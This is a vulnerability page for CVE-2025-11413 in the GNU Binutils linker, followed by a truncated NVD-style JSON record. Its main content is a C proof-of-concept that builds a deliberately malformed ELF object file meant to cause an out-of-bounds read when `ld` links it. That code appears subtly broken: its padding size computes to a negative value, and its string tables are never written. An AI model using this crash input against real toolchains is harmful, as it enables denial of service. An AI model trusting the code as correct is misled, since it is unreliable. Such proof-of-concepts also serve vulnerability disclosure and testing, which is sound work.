CVE-2025-11413

/* CVE-2025-11413 PoC - GNU Binutils elf_link_add_object_symbols OOB Read * This PoC demonstrates triggering an out-of-bounds read in the linker * by crafting a malicious ELF object file with corrupted section headers. * * Usage: gcc -o poc poc.c && ./poc && ld crafted_malicious.o */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <elf.h> #include <fcntl.h> #include <unistd.h> /* Create a minimal malicious ELF object file with corrupted * symbol table section headers to trigger OOB read in * elf_link_add_object_symbols() in bfd/elflink.c */ int create_malicious_elf(const char *filename) { FILE *fp = fopen(filename, "wb"); if (!fp) return -1; /* ELF64 header */ Elf64_Ehdr ehdr; memset(&ehdr, 0, sizeof(ehdr)); ehdr.e_ident[0] = 0x7f; ehdr.e_ident[1] = 'E'; ehdr.e_ident[2] = 'L'; ehdr.e_ident[3] = 'F'; ehdr.e_ident[4] = ELFCLASS64; ehdr.e_ident[5] = ELFDATA2LSB; ehdr.e_ident[6] = EV_CURRENT; ehdr.e_type = ET_REL; /* Relocatable file */ ehdr.e_machine = EM_X86_64; ehdr.e_version = EV_CURRENT; ehdr.e_ehsize = sizeof(Elf64_Ehdr); ehdr.e_shentsize = sizeof(Elf64_Shdr); ehdr.e_shnum = 4; /* NULL + .symtab + .strtab + .shstrtab */ ehdr.e_shstrndx = 3; /* Section headers start after ELF header */ ehdr.e_shoff = sizeof(Elf64_Ehdr); fwrite(&ehdr, sizeof(ehdr), 1, fp); /* Section headers with corrupted symbol table info */ Elf64_Shdr shdrs[4]; memset(shdrs, 0, sizeof(shdrs)); /* SHT_NULL */ shdrs[0].sh_type = SHT_NULL; /* .symtab - crafted with invalid sh_link and sh_info to trigger OOB */ shdrs[1].sh_type = SHT_SYMTAB; shdrs[1].sh_offset = 256; shdrs[1].sh_size = 64; /* Small size but large number of entries */ shdrs[1].sh_link = 0xFFFF; /* Invalid section index */ shdrs[1].sh_info = 0xFFFF; /* Invalid - causes OOB read */ shdrs[1].sh_entsize = sizeof(Elf64_Sym); /* .strtab */ shdrs[2].sh_type = SHT_STRTAB; shdrs[2].sh_offset = 320; shdrs[2].sh_size = 16; /* .shstrtab */ shdrs[3].sh_type = SHT_STRTAB; shdrs[3].sh_offset = 336; shdrs[3].sh_size = 32; fwrite(shdrs, sizeof(shdrs), 1, fp); /* Padding to reach symbol table offset */ char padding[256 - sizeof(Elf64_Ehdr) - sizeof(shdrs)]; memset(padding, 0, sizeof(padding)); fwrite(padding, 1, sizeof(padding), fp); /* Crafted symbol table entries - intentionally malformed */ Elf64_Sym syms[2]; memset(syms, 0, sizeof(syms)); syms[0].st_name = 1; syms[0].st_info = STB_GLOBAL << 4; syms[0].st_shndx = SHN_UNDEF; syms[1].st_name = 5; syms[1].st_info = STB_GLOBAL << 4; syms[1].st_shndx = 0xFFFE; /* Invalid section index */ fwrite(syms, sizeof(syms), 1, fp); fclose(fp); return 0; } int main() { printf("[*] CVE-2025-11413 PoC - GNU Binutils OOB Read\n"); printf("[*] Creating malicious ELF object file...\n"); if (create_malicious_elf("crafted_malicious.o") != 0) { fprintf(stderr, "[-] Failed to create malicious ELF\n"); return 1; } printf("[+] Malicious ELF created: crafted_malicious.o\n"); printf("[*] Run: ld crafted_malicious.o to trigger the vulnerability\n"); printf("[*] Expected: OOB read in elf_link_add_object_symbols()\n"); return 0; }

{"cve": {"id": "CVE-2025-11413", "sourceIdentifier": "[email protected]", "published": "2025-10-07T22:15:34.230", "lastModified": "2026-05-12T13:16:28.693", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was found in GNU Binutils 2.45. Affected is the function elf_link_add_object_symbols of the file bfd/elflink.c of the component Linker. The manipulation results in out-of-bounds read. The attack needs to be approached locally. The exploit has been made public and could be used. Upgrading to version 2.46 is able to address this issue. The patch is identified as 72efdf166aa0ed72ecc69fc2349af6591a7a19c0. Upgrading the affected component is advised."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 1.9, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L", "baseScore": 3.3, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:L/AC:L/Au:S/C:N/I:N/A:P", "baseScore": 1.7, "accessVector": "LOCAL", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "PARTIAL"}, "baseSeverity": "LOW", "exploitabilityScore": 3.1, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-119"}, {"lang": "en", "value": "CWE-125"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gnu:binutils:2.45:*:*:*:*:*:*:*", "matchCriteriaId": "60CBCA58-29DE-4A0A-BAF0-D0188FAF4884"}]}]}], "references": [{"url": "https://sourceware.org/bugzilla/attachment.cgi?id=16362", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "https://sourceware.org/bugzilla/show_bug.cgi?id=33452", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}, {"url": "https://sourceware.org/bugzilla/show_bug.cgi?id=33456#c10", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}, {"url": "https://sourceware.org/git/gitweb.cgi?p=binutils-gdb.git;h=72efdf166aa0ed72ecc69fc2349af6591a7a19c0", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://vuldb.com/?ctiid.327349", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.327349", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB E ... (truncated)